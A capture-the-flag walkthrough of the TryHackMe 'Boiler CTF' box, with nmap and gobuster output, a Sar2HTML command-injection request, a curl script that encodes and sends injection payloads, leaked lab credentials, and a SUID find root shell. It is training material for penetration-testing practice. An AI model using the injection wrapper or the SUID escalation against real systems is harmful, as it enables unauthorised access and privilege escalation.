Tryhackme - Boiler CTF


In this walkthrough, we will be going through the Boiler CTF room from Tryhackme. It is a medium rated box on the platform and demands skill in enumeration, finding public exploits and leveraging basic privilege escalation vectors. Beware of the trolls and rabbit holes the box throws at you. With that said, let's get started.

Boiler CTF

Machine Info:

Title: Boiler CTF
IP address: 10.10.217.53
Difficulty: Medium
Objective: Intermediate level CTF. Just enumerate, you'll get there.

Phase 1 – Enumeration

  • First checking if machine is live or not.

pinging machine to check if live or not

  • Started with a regular nmap service scan, then a full port scan (-p-) to catch services on unusual ports. The default scan shows 21 (FTP), 80 (HTTP) and 10000 (Webmin) open and 53 filtered; the full scan additionally found 55007, an SSH service on a non-standard port.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.217.53
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-13 22:16 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57872 > 10.10.217.53:53 S ttl=37 id=21610 iplen=44  seq=2684070567 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57873 > 10.10.217.53:53 S ttl=58 id=53905 iplen=44  seq=2684005030 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57874 > 10.10.217.53:53 S ttl=53 id=18665 iplen=44  seq=2683939493 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57875 > 10.10.217.53:53 S ttl=57 id=63427 iplen=44  seq=2683873956 win=1024 <mss 1460>
Nmap scan report for 10.10.217.53
Host is up (0.22s latency).
Not shown: 996 closed ports
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
53/tcp    filtered domain
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
10000/tcp open     http    MiniServ 1.930 (Webmin httpd)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

nmap scan

nmap scan on port 55007
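
The default nmap run above only covers the top 1000 ports, which is why 55007 does not show up in it. The two-stage approach the write-up describes (sweep all ports first, then run service detection only on what is open) is shown below as an added example; it is not part of the original post. The function names, the --min-rate value and the sample grepable output are this example's own assumptions, and the SSH version field in the sample is left empty because the write-up does not show it.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): two-stage port scanning.
# Stage 1 sweeps all 65535 TCP ports quickly and writes grepable output;
# stage 2 runs service detection only on the ports stage 1 found open.

# Parse nmap -oG ("grepable") output and print the open TCP ports as a
# comma-separated list, ready to hand to nmap -p. $1 is the .gnmap file,
# or - for stdin. Each entry in a Ports: line looks like
# port/state/proto/owner/service/rpc/version/.
open_ports_from_gnmap() {
  awk -F'Ports: ' '/Ports:/ {
    n = split($2, entries, ", ")
    for (i = 1; i <= n; i++) {
      split(entries[i], f, "/")
      if (f[2] == "open" && f[3] == "tcp") {
        out = (out == "" ? f[1] : (out "," f[1]))
      }
    }
  } END { print out }' "$1"
}

# Stage 1 + stage 2 against a live target. Needs network access to the box
# and is therefore not executed by the tests.
full_scan() {
  local target="$1" gnmap="${2:-allports.gnmap}" ports
  nmap -p- --min-rate 1000 -oG "$gnmap" "$target" >/dev/null
  ports="$(open_ports_from_gnmap "$gnmap")"
  [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
  nmap -sV -sC -p "$ports" "$target"
}

# Constructed sample of what stage 1 produces for this box (assumed, not
# copied from the write-up; the SSH version string is deliberately empty).
SAMPLE_GNMAP=$'# Nmap 7.80 scan initiated as: nmap -p- -oG allports.gnmap 10.10.217.53\n'
SAMPLE_GNMAP+=$'Host: 10.10.217.53 ()\tStatus: Up\n'
SAMPLE_GNMAP+=$'Host: 10.10.217.53 ()\tPorts: 21/open/tcp//ftp///, 53/filtered/tcp//domain///, 80/open/tcp//http///, 10000/open/tcp//http///, 55007/open/tcp//ssh///\tIgnored State: closed (65530)\n'
SAMPLE_GNMAP+='# Nmap done'

# Run the parser over the constructed sample.
demo_open_ports() {
  printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap -
}

# Usage on a live target:
#   full_scan 10.10.217.53
```

Filtered ports (53 here) are deliberately excluded from the second stage; they tell you something is dropping packets, not that a service is listening.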
  • Logged into the FTP server anonymously and found a hidden text file, .info.txt.

wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ ftp 10.10.217.53
Connected to 10.10.217.53.
220 (vsFTPd 3.0.3)
Name (10.10.217.53:wh1terose): anonymous

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (115.2562 kB/s)
ftp> exit
221 Goodbye.
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ cat .info.txt 
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ 

ftp anonymous login

  • Lots of trolls on the machine: .info.txt is ROT13 and decodes to a taunt rather than a hint.

cyberchef decode result in a troll
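
Decoding the file on the command line saves a round trip to CyberChef. The snippet below is an added example, not part of the original write-up: ROT13 is the shift-13 case of a Caesar cipher, so the general shift is implemented once and ROT13 is built on it, and a brute-force helper covers the case where the shift is not obvious. Function names are this example's own; the ciphertext is the one recovered from .info.txt above.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): decode the .info.txt
# troll from the shell. tr does the letter substitution; everything that
# is not an ASCII letter passes through unchanged.

# Shift every ASCII letter by $1 positions (0-25), reading stdin.
caesar_shift() {
  local n=$(( $1 % 26 ))
  local A=ABCDEFGHIJKLMNOPQRSTUVWXYZ a=abcdefghijklmnopqrstuvwxyz
  # Rotate both alphabets by n and let tr map plain -> rotated.
  tr "$A$a" "${A:n}${A:0:n}${a:n}${a:0:n}"
}

# ROT13 is its own inverse: applying it twice gives the input back.
rot13() { caesar_shift 13; }

# Print all 25 candidate shifts of stdin, one per line, for when the
# encoding is a Caesar cipher but not necessarily ROT13.
caesar_bruteforce() {
  local text s
  text="$(cat)"
  for (( s = 1; s <= 25; s++ )); do
    printf '%2d: %s\n' "$s" "$(printf '%s' "$text" | caesar_shift "$s")"
  done
}

# Ciphertext exactly as pulled from the FTP server above.
INFO_TXT='Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!'

decode_info_txt() {
  printf '%s' "$INFO_TXT" | rot13
}

# Usage:
#   decode_info_txt
#   printf '%s' "$INFO_TXT" | caesar_bruteforce
```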

  • Tried to exploit Webmin (MiniServ 1.930) on port 10000; the exploit failed, so this is a dead end.

webmin exploit failed
  • Fired up gobuster against the web server on port 80 and found a Joomla installation.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:20:10 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/joomla               (Status: 301) [Size: 313] [--> http://10.10.217.53/joomla/]
/manual               (Status: 301) [Size: 313] [--> http://10.10.217.53/manual/]
/robots.txt           (Status: 200) [Size: 257]                                  
/server-status        (Status: 403) [Size: 300]                                  
                                                              

gobuster scan

  • Lots of rabbit holes.
robots.txt

  • Ran gobuster against the Joomla directory and found several interesting directories: _archive, _database, _files and _test.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/joomla/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/joomla/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:25:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/_archive             (Status: 301) [Size: 322] [--> http://10.10.217.53/joomla/_archive/]
/_database            (Status: 301) [Size: 323] [--> http://10.10.217.53/joomla/_database/]
/_files               (Status: 301) [Size: 320] [--> http://10.10.217.53/joomla/_files/]   
/_test                (Status: 301) [Size: 319] [--> http://10.10.217.53/joomla/_test/]

gobuster scan on joomla endpoint

http://10.10.217.53/joomla/_test/index.php

sar2html page

  • The _test directory hosts Sar2HTML, which has a known command-injection RCE: the plot parameter is passed to a shell unsanitised, so anything after a ; runs on the server.

Sar2HTML RCE

view log

  • Reading the log file through the injected command:

http://10.10.217.53/joomla/_test/index.php?plot=;cat log.txt
viewing the log file

  • log.txt contains SSH log entries that leak a username and password:
Creds Found:

Username: basterd
Password: superduperp@$$
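
The same injection can be driven from the shell instead of the browser, which is handier once you want to run more than one command. The script below is an added example and not part of the original write-up: it percent-encodes the ";<command>" payload used above so curl sends exactly what was typed, and builds the URL for the _test path found by gobuster. The function names are this example's own, and the request helper assumes the box is reachable, so it is not exercised by the tests.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): drive the Sar2HTML
# command injection from the shell. The payload is the one used above,
# ";<command>" in the plot parameter; this just encodes it properly.

# Percent-encode a string for use as a URL query value. RFC 3986
# unreserved characters are kept, everything else becomes %XX.
urlencode() {
  local LC_ALL=C s="$1" out="" c i
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      [A-Za-z0-9.~_-]) out+="$c" ;;
      *) out+="$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# Build the injection URL: base URL of the sar2html install plus
# index.php?plot=;<cmd>. The leading ';' terminates whatever command the
# application builds around the parameter, so the rest runs as our command.
sar2html_rce_url() {
  local base="${1%/}" cmd="$2"
  printf '%s/index.php?plot=%s' "$base" "$(urlencode ";$cmd")"
}

# Send the request and return the raw page. The command output is
# embedded in the HTML, so grep for the lines you care about. Needs
# network access to the target; not run by the tests.
sar2html_exec() {
  curl -s "$(sar2html_rce_url "$1" "$2")"
}

# Usage (the write-up's target and payload):
#   sar2html_exec http://10.10.217.53/joomla/_test 'cat log.txt' | grep -i ssh
```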

Phase 2 – Exploitation

  • Got our first foothold via SSH on the non-standard port 55007 with the credentials of user "basterd".
SSH into the server

$ cat backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
	     echo "Begining copy of" $i  >> $LOG
	     scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
	     echo $i "completed" >> $LOG
		
		if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
		    rm $SOURCE/$i
		    echo $i "removed" >> $LOG
		    echo "####################" >> $LOG
				else
					echo "Copy not complete" >> $LOG
					exit 0
		fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi
$ su stoner
Password: 
stoner@Vulnerable:/home/basterd$ cd ..
stoner@Vulnerable:/home$ cd stoner/
stoner@Vulnerable:~$ ls
stoner@Vulnerable:~$ ls -al
total 16
drwxr-x--- 3 stoner stoner 4096 Aug 22  2019 .
drwxr-xr-x 4 root   root   4096 Aug 22  2019 ..
drwxrwxr-x 2 stoner stoner 4096 Aug 22  2019 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21  2019 .secret
stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.
stoner@Vulnerable:~$ 
  • Got the password of user "stoner" from backup.sh: it is sitting in a comment directly under USER=stoner (superduperp@$$no1knows), and the REMOTE address 1.2.3.4 is a placeholder. Note also that the if [ -n ... ] check around the remote ls is unquoted, so it is always true when the remote listing is empty and the script would delete the local copy even when the upload failed.

user stoner password revealed

  • Got the user flag from the hidden .secret file.

user flag.

  • sudo -l is another troll; move on.

sudo -l

Phase 3 – Privilege Escalation

  • Started with a linpeas scan to discover potential priv esc vectors. It flagged the "find" binary (how funny) as SUID root, so anything find executes runs with root's effective UID.

linpeas output

  • Used the GTFOBins SUID payload for find to get a root shell and the root flag. The -p flag matters: without it bash drops the effective UID back to the real one on startup.

stoner@Vulnerable:/$ find . -exec /bin/bash -p \;
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
It wasn't that hard, was it?

getting root on box
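
What linpeas flagged can be checked by hand in a couple of lines, which is also how you would audit a box you own for the same weakness. The script below is an added example and not part of the original write-up: it lists SUID-root binaries and marks the ones that GTFOBins documents as SUID escalation primitives, then shows the find escalation used above. The function names and the sample listing are this example's own assumptions (only find is taken from the write-up), and the GTFOBins names are a hand-picked subset, not the full catalogue.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): find SUID-root binaries
# that GTFOBins lists as escalation primitives. A bare "find" with the
# SUID bit is exactly the case abused on this box.

# Hand-picked subset of binaries with a documented GTFOBins "SUID" section.
GTFOBINS_SUID="find vim vi nano bash sh dash zsh env python perl php ruby \
lua awk gawk mawk cp mv less more tar zip unzip tee xxd base64 nmap wget curl \
socat strace gdb rsync make"

# Read one path per line on stdin and print those whose basename is in the
# list above, as "path (name)" so the caller sees why it matched.
flag_gtfobins_suid() {
  local path name w
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    name="${path##*/}"
    for w in $GTFOBINS_SUID; do
      if [ "$name" = "$w" ]; then
        printf '%s (%s)\n' "$path" "$w"
        break
      fi
    done
  done
}

# Live audit: every SUID file owned by root, filtered through the list.
# Not run by the tests (walks the whole filesystem).
audit_suid() {
  find / -perm -4000 -uid 0 -type f 2>/dev/null | flag_gtfobins_suid
}

# The escalation itself, as used above: find runs our command with its
# SUID privileges; bash -p keeps the effective UID instead of dropping it
# to the real UID, and -quit stops after the first match. Not run by tests.
suid_find_shell() {
  find . -exec /bin/bash -p \; -quit
}

# Constructed listing (assumed); only find is taken from the write-up.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/bin/ping
/usr/bin/find
/bin/su
/usr/bin/newgrp'

demo_flagged() {
  printf '%s\n' "$SAMPLE_SUID" | flag_gtfobins_suid
}

# Usage on the box:
#   audit_suid
#   suid_find_shell
```

passwd, sudo, su, ping and newgrp are SUID by design and do not appear in the output; the audit only highlights binaries whose SUID bit hands out arbitrary command execution.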

Task 1 – Questions #1

Question 1 – File extension after anon login

 txt

Question 2 – What is on the highest port?

SSH

Question 3 – What’s running on port 10000?

webmin

Question 4 – Can you exploit the service running on that port? (yay/nay answer)

nay

Question 5 – What’s CMS can you access?

joomla

Question 6 – Keep enumerating, you’ll know when you find it.

Done

Question 7 – The interesting file name in the folder?

log.txt


Task 2 – Questions #2

Question 1 – Where was the other users pass stored(no extension, just the name)?

backup

Question 2 – user.txt

You made it till here, well done.

Question 3 – What did you exploit to get the privileged user?

find

Question 4 – root.txt

It wasn't that hard, was it?



Conclusion

So, that was it. Trust me, this room "Boiler CTF" has a lot of rabbit holes and trolls lying around, and you can waste time and energy chasing them. If the enumeration is done properly, though, the real path to the kingdom shows up. To summarise quickly: we started with a default nmap scan, which showed ports 21, 80 and 10000 open, and a full port scan that added 55007, an SSH service on a non-standard port. We tried to exploit the Webmin service on port 10000 but that failed. Next, gobuster revealed a Joomla install and, under it, a hidden "_test" directory running Sar2HTML. We exploited the command-injection RCE in Sar2HTML to read log.txt, which leaked the SSH credentials for basterd, and a password left in a comment in backup.sh got us to stoner. For privilege escalation, we abused the SUID find binary and got a root shell.
